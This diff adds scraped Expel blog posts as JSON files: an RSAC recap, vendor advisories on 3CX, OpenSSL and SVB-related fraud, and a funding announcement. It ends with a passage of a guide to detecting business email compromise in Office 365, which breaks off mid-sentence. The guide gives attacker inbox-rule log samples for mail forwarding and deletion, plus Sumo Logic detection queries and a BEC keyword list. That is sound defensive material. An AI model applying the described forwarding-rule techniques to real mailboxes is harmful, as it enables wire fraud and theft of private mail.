Constant,\u201d examined the cybersecurity industry\u2019s experience in shaping transformational shifts that will determine the \u201cnext\u201d normal. He discussed how the world has been living with disruption, like the pandemic and the conflict in Ukraine, and explored how physical disruption can create digital ripples\u2014and vice versa. (We all remember how the Colonial Pipeline cyberattack resulted in long lines at the gas pump.) According to Ghai, the Ukrainian hacker army is three times the size of Ukraine\u2019s actual military force. Ghai pointed out that we are moving towards a more hyperconnected world where the physical and digital realms are indistinguishable, and where we\u2019re going to need to know how to deal with a torrent of global disruptions. He ended his address on an encouraging note, stating, \u201cThis is our story. Let\u2019s not allow anyone else to write it.\u201d Cisco\u2019s EVP and GM of security and collaboration, Jeetu Patel, and SVP and GM of Cisco\u2019s security business group, Shailaja Shankar, took to the stage next to ask, \u201cWhat Do We Owe One Another in the Cybersecurity Ecosystem?\u201d Patel outlined three trends that Cisco is hearing from their 300,000+ customers: Businesses are competing as ecosystems, rather than as individual entities, Everyone is an insider, and can be considered a potential threat, and Hybrid work is here to stay. Patel believes that security resilience is the key for organizations faced with these significant cybersecurity challenges. Shankar then described an issue that compounds these potential threats; a concept she\u2019s termed the \u201cSecurity Poverty Line.\u201d This is the baseline security posture companies need to deal with cyber threats. Getting companies above this poverty line, Shankar argued, requires more than information sharing and volunteering to help smaller or struggling organizations\u2014it means truly investing in their security capabilities and even sharing the security risk they might encounter. Tom Gillis, VMware\u2019s SVP and GM of networking and advanced security business group, took to the stage next to reframe our thinking away from separating on-premises, private cloud security from public cloud security. He instead advocated for separating security between traditional virtualized applications and Kubernetes applications. It was an interesting shift in perspective on the usual borders that separate security strategies. Lastly, the microphone passed to Michele Flournoy, the co-founder and managing partner of WestExec Advisors and Avril Haines, the director of national intelligence, and the first woman to hold the job. The conversation tackled \u201cRethinking the Cybersecurity Challenge From an Intelligence Community (IC) Perspective,\u201d and how the intelligence community is collaborating with industry and international partners to rethink how we design networks, and the cybersecurity that protects them. One common thread across the keynote speakers was a hopeful, uplifting, and encouraging tone. Too often in our industry, companies use fear, uncertainty, and doubt to get their points across and compel action. Today, the keynotes centered on how we, as an industry, can pull together to change the world for the better. We\u2019ll be on the showfloor at booth S649 in the South Hall all week! Stop by to say hi, book a meeting or schedule a demo , and keep an eye out for more daily recaps of our time at Moscone\u2014just like this one." +} \ No newline at end of file diff --git a/rsac-round-2-expel-heads-back-to-moscone-expel.json b/rsac-round-2-expel-heads-back-to-moscone-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..794bae46e88bccb378c95b8209633def61d8ae0c --- /dev/null +++ b/rsac-round-2-expel-heads-back-to-moscone-expel.json @@ -0,0 +1,6 @@ +{ + "title": "#RSAC round 2: Expel heads back to Moscone - Expel", + "url": "https://expel.com/blog/rsac-round-2-expel-heads-back-to-moscone/", + "date": "Apr 18, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG #RSAC round 2: Expel heads back to Moscone Expel insider \u00b7 1 MIN READ \u00b7 KELLY FIEDLER \u00b7 APR 18, 2023 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Our bags are packed and we\u2019re counting down as we prep to make our second appearance at RSA Conference (#RSAC) as exhibitors. We made a lot of noise last year\u2014throwback to when YouTube sensation Harry Mack freestyled from our booth on the show floor\u2014and we can\u2019t wait to return to Moscone. We\u2019re especially excited because this year\u2019s theme of \u2018stronger together\u2019 really hits home for us at Expel. We know we\u2019re strongest when we come together as a defender community to share knowledge and lessons learned. We can\u2019t wait to talk shop with our peers, trade stories from the security operations center (SOC), and show you security that makes sense. Recent headlines (think: Silicon Valley Bank and the 3CXDesktopApp supply chain attack ) are only proof points of the increasingly complex threat landscape, meaning security teams need visibility across the cloud, Kubernetes, SaaS apps, and on-prem to keep up. Stop by our booth (S0954 in the South Hall) to see how we translate alerts into prescriptive outcomes with a software-driven approach to security operations. Fueled by our security operations platform, Expel Workbench\u2122, we\u2019ll show you how our managed security products leverage the tech you already have in place to make sure you\u2019re getting the most out of your existing investments. Our goal is to help customers evolve from reactive security strategies to ones that are proactive, measurable and resilient, with managed detection and response (MDR), threat hunting, phishing, and more. By the way, remember that \u2018stronger together\u2019 theme? San Francisco-based artist, Bee Betwee will join us onsite to create an art installation of the many faces, backgrounds, and experiences that represent cybersecurity\u2014live from the show floor. Head to the Expel booth on Tuesday, April 25, and Wednesday, April 26, 2-5pm, and Thursday, April 27, 10am-1pm, to watch Bee work and for the chance to become a part of the art. Want to see for yourself and meet our crew? Book a demo here to see Expel Workbench in action at the booth. We also know the exhibit hall can be loud. Schedule a one-on-one meeting right down the block at Aphotic here (just a six-minute walk from Moscone)." +} \ No newline at end of file diff --git a/security-alert-3cxdesktopapp-supply-chain-attack-expel.json b/security-alert-3cxdesktopapp-supply-chain-attack-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..9411759ec9d1b9fd42114d948c65f8dad2ef1d66 --- /dev/null +++ b/security-alert-3cxdesktopapp-supply-chain-attack-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Security alert: 3CXDesktopApp supply chain attack - Expel", + "url": "https://expel.com/blog/security-alert-3cxdesktopapp-supply-chain-attack/", + "date": "Mar 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Security alert: 3CXDesktopApp supply chain attack Security operations \u00b7 2 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 30, 2023 \u00b7 TAGS: MDR What happened? The popular voice and video conference software, 3CXDesktopApp by 3CX, was recently compromised in an apparent supply chain attack. Attackers have trojanized 3CX installers to turn them into malicious tools used in multi-stage attacks. Starting March 22, 2023, global 3CX users began reporting endpoint detection and response (EDR) quarantining of the 3CXDesktopApp for suspicious behavior. On March 29, CrowdStrike confirmed and published a report that both the Windows and MacOS versions of the application had been compromised in a supply chain attack. According to 3CX, the following versions of 3CXDesktopApp are compromised: Windows versions 18.12.407 and 18.12.416 Mac OS versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416. Why does it matter? 3CX serves more than 600,000 companies worldwide and has over 12 million daily users. Given the vast interconnectedness of the contemporary cyber landscape, the ripple from supply chain attacks like this one creates risk exposure for a massive number of organizations. What\u2019re we doing for our customers? First, we\u2019re reviewing customer logs for evidence of attempted or successful compromise. We\u2019ve also deployed global Be-on-the-Lookout (BOLO) rules to alert when we ingest any security telemetry that contains domains or known bad hashes linked to the attack. Finally, we\u2019ve reviewed all ingested alert signals going back 30 days. As we begin to observe vendor-written detections for this activity, we\u2019ll evaluate these as part of Expel\u2019s detection methodology. We\u2019re also monitoring open source channels for updates. What should you do right now? If you\u2019re using the 3CXDesktopApp application, follow 3CX guidelines by utilizing the web application PWA instead of the desktop application. Next, implement the applicable patches and updates when appropriate and able. 3CX reports that the majority of the domains contacted by the compromised library have already been reported and taken down. However, we still recommend proactively blocking all known IOCs, check out this SecurityWeek article for reference. What can you do longer term? Plan for supply chain attacks\u2014The term \u201csupply chain\u201d can mean different things to different organizations. For many tech companies, your supply chain is a long list of cloud services that facilitate your day-to-day business. Assume attackers target you and plan accordingly. Have plans for alternative supply chain providers\u2014We\u2019re not saying you need a hot backup for all your cloud services, but it\u2019s smart to have a contingency for potentially rapid provider shifts in the event of a catastrophic hack. This should be largely in line with your business continuity plans (which you\u2019ve tested, right?). Prioritize asset management\u2014When you learn about a compromised major vendor or software repository, you must be able to answer, \u201cAre we impacted?\u201d quickly and accurately. Be creative\u2014Failures of imagination are a real (and really unfortunate) thing. And it can be very difficult to dream up attacks like SolarWinds Orion or vulnerabilities like Heartbleed. When planning tabletops, ask people around your company: \u201cWhat\u2019s the worst thing that could happen?\u201d You might be surprised at the scenarios others are worrying about. What next? As we outlined, we\u2019re keeping a close eye on this situation as it unfolds. We\u2019ll update this post with big developments, but keep an eye on our socials ( @ExpelSecurity ) for additional recommendations as they emerge." +} \ No newline at end of file diff --git a/security-alert-high-severity-vulnerability-affecting-openssl.json b/security-alert-high-severity-vulnerability-affecting-openssl.json new file mode 100644 index 0000000000000000000000000000000000000000..d5aaddfb05d20479820e81086222fe724dc53767 --- /dev/null +++ b/security-alert-high-severity-vulnerability-affecting-openssl.json @@ -0,0 +1,6 @@ +{ + "title": "Security alert: high-severity vulnerability affecting OpenSSL ...", + "url": "https://expel.com/blog/security-alert-high-severity-vulnerability-affecting-openssl-v3-and-higher/", + "date": "Nov 3, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Security alert: high-severity vulnerability affecting OpenSSL V3 and higher Security operations \u00b7 2 MIN READ \u00b7 AARON WALTON AND JAMES MASKELONY \u00b7 NOV 3, 2022 \u00b7 TAGS: MDR CVE-2022-3602 & CVE-2022-3786: software that uses OpenSSL 3.0.0-3.0.6 should still be upgraded to 3.0.7 as soon as it is reasonable to do so. What happened? On November 1, 2022, the OpenSSL Project released version 3.0.7 to address two vulnerabilities affecting OpenSSL version 3.0 and later that they classify as high-severity. CVE-2022-3602: \u201cX.509 Email Address 4-byte Buffer Overflow\u201d CVE-2022-3786: \u201cX.509 Email Address Variable Length Buffer Overflow\u201d OpenSSL originally categorized these vulnerabilities as \u201ccritical\u201d severity before disclosing them , but they have now downgraded them after determining they\u2019re less dangerous than initially thought. Why does it matter? OpenSSL is a widely used open-source encryption library. Its widespread adoption contributed to increased initial concern, as any critical exploit could potentially affect a large number of systems (think Heartbleed level of disruption). However, later information revealed that the affected versions (3.0.0-3.0.6) are relatively new and not as widely adopted as first thought. (When considering severity, it\u2019s important to note that the definitions of \u201ccritical\u201d and \u201chigh\u201d used by OpenSSL are their own and don\u2019t follow standard categorizations such as the Common Vulnerability Scoring System [CVSS]. These factors are important when calculating the possible impact.) While CVE-2022-3602 could potentially lead to Remote Code Execution (RCE), the good news is there are several mitigating factors that make successful code execution fairly unlikely on affected systems. According to the OpenSSL notification , exploitation requires either that the attacker have a certificate signed by a trusted Certificate Authority (CA), or that the application would need to ignore certificate verification failures. While this isn\u2019t impossible for attackers, it means the attack takes a lot more work than we first anticipated. On top of that, most systems have a variety of existing security protections against memory attacks. These protections add a layer of complexity to achieving code execution via buffer overflow. The added constraint of only four attacker-controlled bytes further complicates any attack path. Abusing this vulnerability for RCE would require significant development and creation of a complex exploit chain. The second vulnerability, CVE-2022-3786, also abuses a basic buffer overflow and could be used to cause a denial of service (DoS) and prevent use of the software. Some attackers use DoS in attacks, but such attacks typically don\u2019t earn cash and aren\u2019t as interesting and desirable. That doesn\u2019t mean attackers couldn\u2019t use it, but financially motivated attackers are less likely to rush to do so. What you should do While no longer critical, the OpenSSL team still considers these issues to be serious, and software that uses OpenSSL 3.0.0-3.0.6 should still be updated to 3.0.7 as soon as is reasonable. If you have further questions about this vulnerability or any other threat to your cybersecurity environment, please contact us. Sidebar: this event serves as a great reminder that patching and updating software regularly can help prevent attacks. It might seem obvious to security professionals, but vendors are constantly plugging security holes and patching bugs. Ignoring upgrade notifications might be convenient now, but it could cost organizations down the line." +} \ No newline at end of file diff --git a/security-for-the-other-99-percent-expel.json b/security-for-the-other-99-percent-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..87d75e1510f817cf412b94f54f29499fe43337b8 --- /dev/null +++ b/security-for-the-other-99-percent-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Security for the other 99 percent - Expel", + "url": "https://expel.com/blog/security-for-the-other-99-percent/", + "date": "Apr 10, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Security for the other 99 percent Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL \u00b7 APR 10, 2018 \u00b7 TAGS: Announcement / Company news / Mission Every time I read the words \u201cRedThreatStormDoom, the market leading provider of cybersecurity next-gen whatnots, announced it has secured seventy-flabillion dollars in series Q financing \u2026\u201d I jump for joy. The thought of more widgets for massive security organizations that can create yet more categories of spend in their ever expanding budgets warms the cockles of my heart (which are technically the ventricles). OK, no, it actually doesn\u2019t warm anything. I sort of sigh in exasperation. Y\u2019see, while there is great innovation coming from entrepreneurs, it\u2019s frequently focused on solving problems for elite security organizations \u2013 or at the very least elite security spenders. Security \u201cone-percenters,\u201d if you will. Maybe that\u2019s too cynical. But the reality is that much of the innovation coming out of security vendors today can only be effectively employed by security one-percenters, regardless of how much the vendor thinks everyone should (or can) use their product. Why is that? Two primary reasons: budget realities and people. First, security budgets are finite . Unless you\u2019re a top-tier bank it\u2019s unlikely your spend is increasing every year. You probably don\u2019t buy one of everything. And even if you do, it\u2019s highly unlikely you\u2019ve got the people you\u2019d need to get the value out of all those widgets. People are expensive \u2013 whether you\u2019re talking salaries or the opportunity cost of keeping them happy or dealing with the times you fail to keep them happy. And if you\u2019re looking to have 24\u00d77 operations you can multiply that expense yet again. \u201cBut what about the AIs?\u201d you might ask. \u201cAren\u2019t they supposed to get those pesky humans out of the loop?\u201d Well sure \u2026 but only if you embed them in a blockchain. And name your company blockchain.ai. THEN you might be on to something. (How sad is it that I just typed \u201cblockchain.ai\u201d into my browser to make sure it wasn\u2019t a thing because in this day and age you can\u2019t be sure?). OK, fine, let\u2019s actually deal with that. What about the AIs? A variety of advances in computer science, including AI, machine learning techniques, etc., can help us. But it\u2019s not going to eliminate people any time soon. Improvements that come from the AIs and MLs will increasingly augment the human decision maker. Ergo, my prior comments regarding one-percenters and the expense of keeping the brains in the loop happy. With that overlong preamble, I\u2019m pleased to announce Expel, the nowhere-near-market-leading (yet \u2026 because we\u2019re a 20 month old start-up) provider of transparent managed security has secured $20 million in series B financing, led by Scale Venture Partners, and joined by all of our existing (and fantastic) supporters at Battery Ventures, Greycroft, Lightbank, NEA, Paladin Capital Group and Profile Capital Management. Why am I pleased? Because increasingly we\u2019re finding people of like mind that agree with our view of the world: the biggest gap in the information security market isn\u2019t a lack of interesting, innovative technology to generate security signal in your (endpoint, network, cloud) infrastructure. It\u2019s an inability to turn that into something you can action at a realistic, predictable cost. Hiring your way out of the problem isn\u2019t going to work for most organizations, and you can\u2019t buy a magic AI-in-a-box to make the problem go away. So what are the other 99 percent supposed to do? The logical answer is \u201cgo get yourself a managed security service provider (MSSP).\u201d But we think that market\u2019s in flux . On one hand you have the legacy MSSP providers, long in the tooth, mired in old technologies and processes, slogging through alerts with hordes of analysts stacked up like a cord of wood in a SOC. On the other hand, you\u2019ve got niche managed offerings \u2013 often referred to as managed detection and response (MDR) \u2013 focused on specific managed security use cases and technologies. While some of these solutions provide value, they still operate as a black box. It\u2019s hard to know what\u2019s happening behind the curtain (in their SOC). Nobody is going after the whole solution and no one is using your existing security investments to provide a transparent managed offering that delivers answers \u2026 not just alerts. Here at Expel we\u2019re trying to fix that. And this new investment will help us do it a bit faster. Now, in the spirit of ending with an \u201cexecutable\u201d \u2013 something you can go away and do without writing a check \u2013 take a look at this post from our CISO , Bruce Potter (we say it \u201cSEE-so,\u201d mostly to annoy Bruce). It shows how you can use the NIST Cybersecurity Framework to evaluate and visualize where you\u2019re at and where you want your security program to go. It includes some tips and a self-scoring Excel spreadsheet that lets you use the NIST CSF in a common sense way. It also speaks to what Expel provides in a CSF context. If you\u2019re thinking to yourself \u201cthat\u2019s nice you got funding and all, but what specific impact will you have on my environment\u201d this provides the answer." +} \ No newline at end of file diff --git a/security-psa-svb-collapse-presents-ripe-opportunity-for.json b/security-psa-svb-collapse-presents-ripe-opportunity-for.json new file mode 100644 index 0000000000000000000000000000000000000000..2e9a4254cd8eef977807de3417a2615950ae81c7 --- /dev/null +++ b/security-psa-svb-collapse-presents-ripe-opportunity-for.json @@ -0,0 +1,6 @@ +{ + "title": "Security PSA: SVB collapse presents ripe opportunity for ...", + "url": "https://expel.com/blog/security-psa-svb-collapse-presents-ripe-opportunity-for-counterparty-fraud/", + "date": "Mar 16, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Security PSA: SVB collapse presents ripe opportunity for counterparty fraud Security operations \u00b7 2 MIN READ \u00b7 GREG NOTCH \u00b7 MAR 13, 2023 \u00b7 TAGS: MDR Blog updated on March 16 What happened? Following the collapse of Silicon Valley Bank (SVB) and the resulting uncertainty throughout the banking sector, many vendors and suppliers will be updating their banking information. Accounts receivable (AR) departments will reach out to accounts payable (AP) departments with new routing and account numbers at a much higher volume than usual. Why does it matter? An increased volume of bank account switching presents a massive opportunity for payment counterparty fraud. If an attacker is able to deceive someone into altering a few account and routing numbers, they can direct money to themselves, rather than your vendor or into your own accounts. Often this begins with compromised or forged emails resulting from business email compromise (BEC). Depending on the size of your environment, this may go unnoticed for some time. By the time you detect the attack, you could be out a significant amount of money\u2014and you\u2019ll still owe your vendor. What\u2019re we doing? At this time, we\u2019ve begun to see SVB-themed phishing submissions. Expel has created several YARA detections to identify phishing attacks affiliated with SVB and is assessing new detections for both our phishing and managed detection and response (MDR) offerings. What should you do right now? Validate account changes with known contacts at the counterparty where possible. Don\u2019t do this via email if it can be avoided (in case either your email or the other party\u2019s is compromised). Confirm receipt of a test deposit of a nominal value prior to making a bank account change for your vendor. This takes a bit more effort, but there\u2019s little doubt fraudsters will try to take advantage of the turmoil. What can you do longer term? BEC isn\u2019t new. It accounted for over half of all cyber incidents last year (according to our annual threat report ), and remains the top threat facing our customers. We also saw threat actors targeting human capital management systems\u2014specifically, Workday\u2014with the goal of payroll and direct deposit fraud. Situations like what\u2019s happening with SVB only exacerbate the opportunity for bad actors to exploit people as they scramble to ensure their finances are protected\u2014and prevention starts with proper training. Make sure employees are trained to recognize potential red flags associated with phishing emails. Spend time educating specific business units about the phishing campaigns that might target them. In this example, finance teams might encounter financial-themed campaigns with subject lines such as \u201cURGENT:INVOICES\u201d or \u201cbank change\u201d (and they may even reference SVB directly). Once employees know what to look for, make it easy for them to report any suspicious activity. We recommend implementing a system for employees to validate suspicious emails or texts, allowing IT to provide guidance to the individual and giving security teams enough insight to identify trends that might indicate a larger scale attack early on. These trainings can mean an investment up-front, but they\u2019ll pay dividends in the long run. What next? With the collapse of SVB, there\u2019s always the potential for further turmoil within the banking industry (we also saw the shuttering of Signature Bank over the weekend). As these events unfold, we\u2019ll continue working with our customers to help protect them from bad actors looking to exploit the situation. By the way, not an Expel phishing customer and think you\u2019d like to be? Reach out ." +} \ No newline at end of file diff --git a/signs-of-business-email-compromise-bec-phishing.json b/signs-of-business-email-compromise-bec-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..bc6b7182f73b0fef6a512d632b88dc7af89ac3e0 --- /dev/null +++ b/signs-of-business-email-compromise-bec-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Signs of Business Email Compromise (BEC) Phishing ...", + "url": "https://expel.com/blog/seven-ways-to-spot-business-email-compromise-office-365/", + "date": "Feb 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Seven ways to spot a business email compromise in Office 365 Tips \u00b7 10 MIN READ \u00b7 JON HENCINSKI \u00b7 FEB 14, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC Remember the old days when all of those Nigerian princes were emailing you to offer giant sums of money? All you\u2019d need to do, of course, was click that suspicious-looking link, share your bank account information and you\u2019d be living large. (Finally, a good reason to stop buying all those Powerball tickets.) That scam is the old school version of a type of attack called a business email compromise (BEC). While those generous Nigerian princes have long since vanished, BEC has gotten far more sophisticated over the years, turning even the savviest internet users into unwitting victims. As attackers behind BEC attacks find ever more clever tactics to use, it\u2019s getting trickier for businesses to protect themselves. But there are some telltale signs you can look for that are tip-offs that something\u2019s amiss. What is business email compromise (BEC)? First things first, though. You\u2019ve got to know what you\u2019re looking for. Business email compromise (BEC) is a sophisticated, email-based scam targeting organizations and individuals just about everywhere. Many people think that BEC is only associated with wire transfer fraud, but the reality is that BEC is much more than that . It\u2019s really an umbrella term that includes things like W2 scams , romance scams , real estate scams and lottery scams . You\u2019re probably sitting there thinking, \u201cDo people really fall for these tricks?\u201d They sure do. And it happens more often than you think. In fact, between October 2013 and May 2018 , there were 78,617 domestic and international BEC incidents, with victims from over 150 countries and all 50 U.S. states. BEC fraud has become so widespread that it\u2019s now the target of major international law enforcement efforts coordinated domestically and abroad by organizations like the FBI and U.S. Department of Justice. Just this past summer, a BEC takedown effort named Operation WireWire resulted in 74 arrests globally, including 42 in the U.S. They nabbed nearly $2.4 million and recovered approximately $14 million in fraudulent wire transfers. Now for the good news: There are ways that you can spot BEC attacks and stop them before they compromise unsuspecting employees. Three common categories of BEC scams 1. CEO Impersonation During a CEO fraud scam, the hacker will impersonate the CEO or another executive at the org in an attempt to trick any level of employee to divulge private information. These requests can range from sending confidential client information or tax information via email to executing wire transfers that are not authorized. In some cases, these schemes can be spear-phishing attacks where an employee is convinced to download a file or software onto a work computer. 2. Full Account Takeover One of the biggest goals for a cyberattacker is full takeover. This category of BEC scams can be the most devastating. Interestingly, a report from IDG Communications found that more than 56 percent of orgs reported falling victim to a breach caused by their vendor. 3. False Invoice Scheme False invoice schemes typically target a member of the financial or accounting department. More experienced cyberattackers will alter a legitimate invoice\u2019s bank account numbers but leave the rest of the document unchanged, making it very challenging to notice the invoice is fake. From there, the possibilities are endless. Some attackers increase the payment amount or create a double payment, among many other common hacking techniques. How to spot (and alert on) BEC activity Through the Expel SOC\u2019s investigate work responding to many BEC activities in Office 365 (O365), we\u2019ve observed threat actors reusing certain techniques to gain and maintain access to victims\u2019 mailboxes. Take a look at this example of a recent investigation where a threat actor used BEC to access a victim\u2019s mailbox and then set up mailbox Inbox rules to redirect any emails that contained the words \u201cstatement,\u201d \u201coutstanding,\u201d \u201cpastdue,\u201d \u201cpayment,\u201d \u201cinvoice\u201d or \u201cwire\u201d to a Gmail account. Here are some common hallmarks of crafty BEC attacks, that our own SOC analysts here at Expel have detected in the last few months by using the Expel Workbench. We\u2019re going to share some of the techniques that we see attackers using again and again so you can take steps to protect your own org. As a bonus, we\u2019ll even share log samples and example SIEM queries (we\u2019re using Sumo Logic ) if you want to query your own tools for related activity. Plus we\u2019re sharing our perspective on how likely you are to get false positives from these rules. You\u2019ll probably notice that there\u2019s a theme to these often-used attacker techniques: the creation of new mail inbox rules. Why are we focusing so much on inbox rules? Because the attackers running these scams generally create inbox rules to hide evidence from their victims that the victim\u2019s mailbox is being used to perpetuate those clever BEC activities. The good news is that since attackers use this tactic so often, it creates a great detection opportunity, because there are only so many rules an attacker can create to cover his or her tracks. As you look for evidence of BEC attempts, you should be alerting on: 1. Inbox rules to automatically forward emails to any of the following folders: RSS subscriptions, junk email or notes During a recent investigation, we detected a threat actor creating an inbox rule to automatically forward emails containing \u201cWeTransfer\u201d in the email subject or body to the \u201cRSS subscriptions\u201d folder of the victim\u2019s mailbox. Log example: \"Operation\":\"New-InboxRule\", \"RecordType\":1, \"ResultStatus\":\"True\", \"UserType\":2, \"Version\":1, \"Workload\":\"Exchange\", \" { \"Name\":\"AlwaysDeleteOutlookRulesBlob\", \"Value\":\"False\" },{ \"Name\":\"Force\", \"Value\":\"False\" },{ \"Name\":\"MoveToFolder\", \"Value\":\"RSS Subscriptions\" },{ \"Name\":\"Name\", \"Value\":\"..\" },{ \"Name\":\"SubjectOrBodyContainsWords\", \"Value\":\"WeTransfer\" },{ \"Name\":\"MarkAsRead\", \"Value\":\"True\" },{ \"Name\":\"StopProcessingRules\", \"Value\":\"True\" }], Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"MoveToFolder\", \"Value\":\"RSS Subscriptions\"\" Expected false positive rate: Low (In our world, \u201clow\u201d means that you can enter this into an alert management workflow with minimal tuning work required.) 2. Inbox rules to automatically delete messages Similar to folder redirection, we\u2019ve detected threat actors creating new inbox rules to silently drop any emails that contained words like \u201cvirus,\u201d \u201chacked,\u201d \u201chack,\u201d \u201cspam\u201d or \u201crequest\u201d in the email subject or body. You can start by creating an alert for the creation of inbox rules to automatically delete messages with keywords, but we recommend alerting on any new inbox rule that\u2019s designed to automatically delete messages. Log example: \"Operation\":\"New-InboxRule\", \"Parameters\":[{ \"Name\":\"AlwaysDeleteOutlookRulesBlob\", \"Value\":\"False\" },{ \"Name\":\"Force\", \"Value\":\"False\" },{ \"Name\":\"SubjectOrBodyContainsWords\", \"Value\":\"virus;hacked;hack;spam;request\" },{ \"Name\":\"DeleteMessage\", \"Value\":\"True\" },{ \"Name\":\"MarkAsRead\", \"Value\":\"True\" },{ \"Name\":\"StopProcessingRules\", \"Value\":\"True\" }] Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"DeleteMessage\", \"Value\":\"True\"\" False positive rate: Low 3. Inbox rules to redirect messages to an external email address Using this technique, the message isn\u2019t delivered to the original recipients and no notification is sent to the sender or the original recipients. We\u2019ve detected threat actors creating inbox rules to redirect emails that contained words like \u201cstatement,\u201d \u201coutstanding,\u201d \u201cpast due,\u201d \u201cpayment,\u201d \u201cinvoice\u201d or \u201cwire\u201d to email accounts outside of the organization\u2019s domain (for example, a Gmail account). Log example: \"Operation\": \"New-InboxRule\", \"Parameters\": \"[rn {rn \"Name\": \"AlwaysDeleteOutlookRulesBlob\",rn \"Value\": \"False\"rn },rn {rn \"Name\": \"Force\",rn \"Value\": \"False\"rn },rn {rn \"Name\": \"RedirectTo\",rn \"Value\": \"@gmail.com\"rn },rn \"Name\": \"SubjectOrBodyContainsWords\",rn \"Value\": \"statement;outstanding;past due;payment;invoice;wire\"rn },rn {rn \"Name\": \"StopProcessingRules\",rn \"Value\": \"True\"rn }rn]\", Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND \"Name\":\"RedirectTo\"\" False positive rate: This alert is susceptible to false positives since it\u2019s not uncommon for users to forward work-related emails to a personal webmail account. If you\u2019ve integrated O365 with your SIEM, modify the query or rule set to alert and filter out known false positives. 4. Inbox rules that contain BEC keywords You\u2019re probably starting to see a theme emerge in these first three examples: using keywords to redirect emails. We\u2019ve detected threat actors by alerting anytime we see any inbox rule created using a value in our BEC keyword list. Here\u2019s a snippet of our own BEC keyword list to get you started: Virus Dropbox Password Fraud W2 Invoice Docusign Deposit Wire Tax Postmaster Utilpro Payroll Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\") AND (\"wetransfer\" OR \"document\" OR \"invoice\" OR \"postmaster\") False positive rate: Low 5. New mailbox forwarding to an external address This technique doesn\u2019t involve inbox rules. Instead, it watches for wiley attackers who are configuring an external email address in the victim\u2019s account settings menu. While the setup is a bit different, the intent is the same: the attacker is trying to hide evidence from the victim that his or her mailbox is being used to perpetuate BEC fraud. Log example: \"Operation\":\"Set-Mailbox\",{\"Name\":\"ForwardingSmtpAddress\",\"Value\":\"smtp:\"},{\"Name\":\"DeliverToMailboxAndForward\",\"Value\":\"True\"}],\"application-action\":\"Set-Mailbox\",\"triggered-by\":{\"app-username\":\",\",\"privileges\":[{\"level\":\"admin\"}],\"new-values\":{\"additional-properties\":{\"DeliverToMailboxAndForward\":\"True\"},\"forward-to-address\":\"smtp:\" Sumo Logic query example: (\"\"New-InboxRule\"\" OR \"\"Set-InboxRule\"\" OR \"\"Set-Mailbox\"\") AND \"Name\":\"DeliverToMailboxAndForward\"\" False positive rate: This alert is also susceptible to false positives since it\u2019s not uncommon for users to forward work-related emails to a personal webmail account. If you\u2019ve integrated O365 with your SIEM, modify the query or rule set to alert and filter out known false positives. 6. New mailbox delegates This rule looks for threat actors that are gaining access to a victim\u2019s account through mailbox delegate access rights. Take a look at this example of a potential BEC threat we detected for one of our customers just last week that involved suspicious mailbox permissions: Log example: {\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"},{\"Name\":\"InheritanceType\",\"Value\":\"All\"}]\"application-action\":\"Add-MailboxPermission\",\"status\":{\"code\":\"Success\"} Sumo Logic query example: (\"Add-MailboxPermission\") AND \"Name\":\"AccessRights\"\" AND \"Value\":\"FullAccess\"\" False positive rate: This alert is also susceptible to false positives as it\u2019s not uncommon for organizations to enable access to the mailbox and calendar of high ranking employees to schedule meetings and travel. You\u2019ll need to tune this to your environment a bit. 7. Successful mailbox logins within minutes of denied logins due to conditional access policies Through O365 and Azure AD, you can implement conditional access policies to deny logins based on conditions like source country, source IP address or a sign-in risk score calculated on the backend by Microsoft. One very important detail: conditional access policies are enforced after the first-factor of authentication. Here\u2019s what it looks like in Expel Workbench: In the example above, O365 recorded a failed login from a foreign country due to a conditional access policy. Unfortunately, this can be bypassed using a virtual private network (VPN) service provider. Take a look at this example from a recent investigation where a threat actor circumvented conditional access policies by simply turning on their VPN. At 22:17:40 UTC, O365 logs recorded a login failure due to a conditional access policy set to deny authentications from a list of foreign countries. Minutes later at 22:22:40, O365 logs recorded a successful login to the same account from a popular virtual private network service provider. If you\u2019re sending O365 logs to your SIEM or have a way to implement time-based detections, fire an alert when O365 records a successful login within minutes of a failed login due to conditional access policies for the same account. Another option is to fire an alert when O365 records a successful login originating from a virtual private network service provider within minutes of a failed login due to conditional access policies for the same account. If you don\u2019t have an easy way to do this, start by reviewing alerts for failed logins due to any existing conditional access policies to get a better understanding of what\u2019s going on in your environment. You found a lead. Now what? If you identify something that doesn\u2019t look quite right, here are some investigative tips to help you chase down a potential lead into BEC activity: Identify the source of the activity Whether you\u2019re chasing down a suspicious mailbox Inbox rule or a usual email delegate, identify the source IP address associated with the successful authentication into the account when the activity in question occurred. Next, look up the additional information about the IP address, such as categorical and location information. This will allow you to understand if the IP address in question associated with an internet service provider (ISP) in your organization\u2019s geographic area or if the IP address in question is part of a VPN service provider range or located in another country based on GeoIP records. Review login activity for the user Next, review 30 days\u2019 worth of login activity for the user in question. This research will help you determine if the user typically logs in to O365 from the IP address in question. Also, review user-agent activity to understand typical operating system and browser combinations. If you\u2019re chasing something down that doesn\u2019t pass the smell test, do you suddenly see a login from an odd IP address using a version of Google Chrome running on Windows when the user normally logs in from a fixed ISP line using a version of Chrome on macOS? Establish a sense of what \u201cnormal\u201d looks like and watch out for deviations. We follow this same approach when pursuing leads into suspicious O365 activity in Expel Workbench where we can take advantage of automation to speed things up a 